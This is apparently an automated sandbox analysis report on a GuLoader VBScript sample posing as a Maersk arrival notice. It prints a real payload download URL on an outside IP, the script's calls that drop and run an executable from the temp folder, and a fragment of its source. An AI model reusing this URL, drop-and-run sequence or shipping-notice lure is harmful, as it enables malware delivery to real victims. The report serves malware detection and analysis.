Play interactive tour

Edit tour

Windows Analysis Report Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs

Overview

General Information

Sample Name:	Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs
Analysis ID:	500597
MD5:	3db65d6cb8c8f1b0e97dfc293d28e295
SHA1:	c3fb70c3613ccdcdac2e4a12df17551ab93a88a4
SHA256:	6394c4e126b8ef4cf8e66d43a54cfd42fd86b3003292f621f0ca427bc12051d8
Tags:	GuLoadervbs
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

VBScript performs obfuscated calls to suspicious functions

Yara detected GuLoader

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Uses ipconfig to lookup or modify the Windows network settings

Creates a DirectInput object (often for capturing keystrokes)

Java / VBScript file with very long strings (likely obfuscated code)

PE file contains an invalid checksum

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Contains functionality for execution timing, often used to detect debuggers

Found WSH timer for Javascript or VBS script (likely evasive script)

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

wscript.exe (PID: 360 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

ipconfig.exe (PID: 4308 cmdline: ipconfig.exe /release MD5: C7FAFF418EF7AD7ABDA10A5BCF9B53EB)

conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

AZTEKERNES.exe (PID: 3336 cmdline: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe MD5: C7778BEEB7B4EE95495E9268EB7DC6A2)

ipconfig.exe (PID: 4892 cmdline: 'C:\Windows\System32\ipconfig.exe' /renew MD5: C7FAFF418EF7AD7ABDA10A5BCF9B53EB)

conhost.exe (PID: 3156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://178.32.63.50/mvbs/Host_hKVPgVgQ234.bin"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.765264321.0000000002AE0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000003.00000002.765264321.0000000002AE0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://178.32.63.50/mvbs/Host_hKVPgVgQ234.bin"}

Multi AV Scanner detection for submitted file

Show sources

Source: Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs

ReversingLabs: Detection: 13%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Joe Sandbox ML: detected

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://178.32.63.50/mvbs/Host_hKVPgVgQ234.bin

Source: AZTEKERNES.exe, 00000003.00000002.762956347.000000000078A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs

Initial sample: Strings found which are bigger than 50

Source: AZTEKERNES.exe.0.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_004013E8	3_2_004013E8
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_0040954B	3_2_0040954B
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE91AF	3_2_02AE91AF
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AEAB15	3_2_02AEAB15
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE9AA6	3_2_02AE9AA6
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE4C08	3_2_02AE4C08
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE247B	3_2_02AE247B
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE4E71	3_2_02AE4E71
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE2A45	3_2_02AE2A45
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE2A50	3_2_02AE2A50
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE8DDD	3_2_02AE8DDD
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE81DB	3_2_02AE81DB
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE4D6E	3_2_02AE4D6E
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE4D43	3_2_02AE4D43

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Code function: 3_2_02AE91AF NtAllocateVirtualMemory,

3_2_02AE91AF

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Process Stats: CPU usage > 98%

Source: Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs

ReversingLabs: Detection: 13%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig.exe /release
Source: C:\Windows\System32\ipconfig.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\ipconfig.exe 'C:\Windows\System32\ipconfig.exe' /renew
Source: C:\Windows\System32\ipconfig.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig.exe /release	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\ipconfig.exe 'C:\Windows\System32\ipconfig.exe' /renew	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3156:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_01

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs'

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Jump to behavior

Source: classification engine

Classification label: mal92.troj.evad.winVBS@9/1@0/0

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Show sources

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: CreateTextFile("C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe", "true");ITextStream.WriteLine("MZ");ITextStream.Close();IWshShell3.Exec("C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe");IWshShell3.Exec("ipconfig.exe /release");IWshExec.StdOut();ITextStream.AtEndOfStream();IWshExec.StdOut();ITextStream.ReadLine();IWshExec.StdOut();ITextStream.AtEndOfStream();IWshExec.StdOut();ITextStream.ReadLine();IWshExec.StdOut();ITextStream.AtEndOfStream();IWshExec.StdOut();ITextStream.ReadLine();IWshExec.StdOut();ITextStream.AtEndOfStream();IWshExec.StdOut();ITextStream.ReadLine();IWshExec.StdOut();ITextStream.AtEndOfStream();IWshExec.StdOut();ITextStream.ReadLine();IWshExec.StdOut();ITextStream.AtEndOfStream();IWshShell3.ExpandEnvironmentStrings("%temp%");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe", "true");ITextStream.WriteLine("MZ");ITextStream.Close();IWshShell3.Exec("C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe");IHost.Sleep("5000");IWshShell3.Run("ipconfig.exe /renew", "0", "true")

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000003.00000002.765264321.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY

Source: AZTEKERNES.exe.0.dr

Static PE information: real checksum: 0x22529 should be: 0x22f38

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_00411684 push esi; retn 000Ch	3_2_00411BF9
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_00407A58 pushad ; ret	3_2_00407A93
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_0040980C push esp; iretd	3_2_00409980
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_00405E17 push edi; iretd	3_2_00405E18
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_004098A9 push esp; iretd	3_2_00409980
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_00404531 pushad ; ret	3_2_00404532
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE5486 push esi; iretd	3_2_02AE63BC
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE5480 push ebp; iretd	3_2_02AE5484
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE6222 push edi; ret	3_2_02AE6223
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE5A21 push esi; iretd	3_2_02AE63BC
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE1656 push es; ret	3_2_02AE1682
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE11A4 push ebp; retf	3_2_02AE1163
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE21B0 push cs; retf	3_2_02AE21B9
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE63E9 push esi; iretd	3_2_02AE63BC
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE5DFC push edx; retf	3_2_02AE5DFD
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE112C push ebp; retf	3_2_02AE1163
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE1F3B push cs; retf	3_2_02AE1F43
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE630A push esi; iretd	3_2_02AE63BC

Source: initial sample

Static PE information: section name: .text entropy: 6.83637943712

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings

Show sources

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig.exe /release

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Jump to dropped file

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Code function: 3_2_0040784E rdtsc

3_2_0040784E

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE89A8 mov eax, dword ptr fs:[00000030h]		3_2_02AE89A8
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 3_2_02AE8F0C mov eax, dword ptr fs:[00000030h]		3_2_02AE8F0C

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Code function: 3_2_0040784E rdtsc

3_2_0040784E

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Code function: 3_2_02AEAB15 RtlAddVectoredExceptionHandler,

3_2_02AEAB15

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: AZTEKERNES.exe.0.dr

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig.exe /release	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\ipconfig.exe 'C:\Windows\System32\ipconfig.exe' /renew	Jump to behavior

Source: AZTEKERNES.exe, 00000003.00000002.763515162.0000000000E10000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: AZTEKERNES.exe, 00000003.00000002.763515162.0000000000E10000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: AZTEKERNES.exe, 00000003.00000002.763515162.0000000000E10000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: AZTEKERNES.exe, 00000003.00000002.763515162.0000000000E10000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: AZTEKERNES.exe, 00000003.00000002.763515162.0000000000E10000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting121	Path Interception	Process Injection12	Process Injection12	Input Capture1	Query Registry1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Scripting121	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information3	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing1	NTDS	System Network Configuration Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs	5%	Virustotal		Browse
Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs	13%	ReversingLabs	Script-WScript.Trojan.Valyria

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	100%	Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://178.32.63.50/mvbs/Host_hKVPgVgQ234.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://178.32.63.50/mvbs/Host_hKVPgVgQ234.bin	true	Avira URL Cloud: safe	unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	500597
Start date:	12.10.2021
Start time:	04:28:30
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	37
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.evad.winVBS@9/1@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 41.9% (good quality ratio 26.6%) Quality average: 35.4% Quality standard deviation: 32.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs Override analysis time to 240s for JS/VBS files not yet terminated
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, RuntimeBroker.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.82.210.154, 95.100.218.79, 95.100.216.89, 20.50.102.62, 2.20.178.24, 2.20.178.33, 104.94.89.6, 51.104.136.2, 40.112.88.60, 20.54.110.249 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	90114
Entropy (8bit):	6.176120840793422
Encrypted:	false
SSDEEP:	1536:QhVs0kRE/a2WXJ633x4Cx1Kq/Vd1PhhyI8jstoidUr:QjAGtc63XvK8d1Pz5Sr
MD5:	C7778BEEB7B4EE95495E9268EB7DC6A2
SHA1:	1BB4978F7A7AFAFFDDA28465D883157A83487E23
SHA-256:	9AAE447ECF7C9B42058153993D02DCC0EF2D92984A0987CF543E6E132740E2EA
SHA-512:	CE2FB8E246AB977726D19B4562A5502FBC8A8E4038FFA6FA15D02FDEDFA6FDB3D780648058478CA532865444D7441764840DB98867662CF27102A946701AFCCC
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L......W................. ...P...............0....@.................................)%......................................d...(....`..z...................................................................(... .......(............................text...L........ .................. ..`.data...x ...0.......0..............@....rsrc...z....`... ...@..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	ASCII text, with CRLF line terminators
Entropy (8bit):	3.9982283274649064
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs
File size:	215177
MD5:	3db65d6cb8c8f1b0e97dfc293d28e295
SHA1:	c3fb70c3613ccdcdac2e4a12df17551ab93a88a4
SHA256:	6394c4e126b8ef4cf8e66d43a54cfd42fd86b3003292f621f0ca427bc12051d8
SHA512:	ad8fbef4974d2ad526d0a1fdd312d6f08faaca87b04e7e096d5af44aba912ab165e6253f587e3a841e6f48041015f2bf4b5f9b849ded66c2b07a712d448b209a
SSDEEP:	1536:iuAsWuLukVVDrwlapE/kowuDrxPQh2QYVGtVNJ8r9PRloka7N+EcSpUJ7hSiiMLT:iNgEgRnYUZ+LSQT+lez
File Content Preview:	Dim objshell, objExec, strLine..set objShell = CreateObject("Wscript.Shell")....Set objExec = objShell.Exec("ipconfig.exe /release")..Do Until objExec.StdOut.AtEndOfStream.. strLine = strLine & objExec.StdOut.ReadLine()..Loop......if InStr(1,strLine ,

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 360 Parent PID: 3472

General

Start time:	04:29:27
Start date:	12/10/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs'
Imagebase:	0x7ff680b70000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: ipconfig.exe PID: 4308 Parent PID: 360

General

Start time:	04:29:28
Start date:	12/10/2021
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	ipconfig.exe /release
Imagebase:	0x7ff706f90000
File size:	34304 bytes
MD5 hash:	C7FAFF418EF7AD7ABDA10A5BCF9B53EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 5776 Parent PID: 4308

General

Start time:	04:29:28
Start date:	12/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: AZTEKERNES.exe PID: 3336 Parent PID: 360

General

Start time:	04:29:33
Start date:	12/10/2021
Path:	C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe
Imagebase:	0x400000
File size:	90114 bytes
MD5 hash:	C7778BEEB7B4EE95495E9268EB7DC6A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.765264321.0000000002AE0000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: ipconfig.exe PID: 4892 Parent PID: 360

General

Start time:	04:29:39
Start date:	12/10/2021
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\ipconfig.exe' /renew
Imagebase:	0x7ff706f90000
File size:	34304 bytes
MD5 hash:	C7FAFF418EF7AD7ABDA10A5BCF9B53EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 3156 Parent PID: 4892

General

Start time:	04:29:39
Start date:	12/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff797770000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: AZTEKERNES.exe PID: 3336 Parent PID: 360 AZTEKERNES.exeCOMMON

Executed Functions

Function 004013E8, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 315COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 004013ED

Strings

VB5!6&*, xrefs: 004013E8

Memory Dump Source

Source File: 00000003.00000002.762481080.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.762462032.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.762549972.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.762578524.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 4761b945ad0596f4d8c02abdee4c789572154a55d8f7ad373e2c0efa9c8ea84c
Instruction ID: a51a24be99b9b1e4edfe5f7bbc3ba33960ae3c88096309706299339b596f3dfb
Opcode Fuzzy Hash: 4761b945ad0596f4d8c02abdee4c789572154a55d8f7ad373e2c0efa9c8ea84c
Instruction Fuzzy Hash: 3C919A6504E3D19FD3039B708CA55A27FB4EE1321471E06DBD8C2CF5A3E22C596AD762

Uniqueness

Uniqueness Score: -1.00%

Function 02AEAB15, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

73g, xrefs: 02AEAE5E

Memory Dump Source

Source File: 00000003.00000002.765264321.0000000002AE0000.00000040.00000001.sdmp, Offset: 02AE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 73g
API String ID: 0-972357897
Opcode ID: ef85f3a9228cb57956d88697c7f5c1579384eadefb3097a1fb21b772c36a2d97
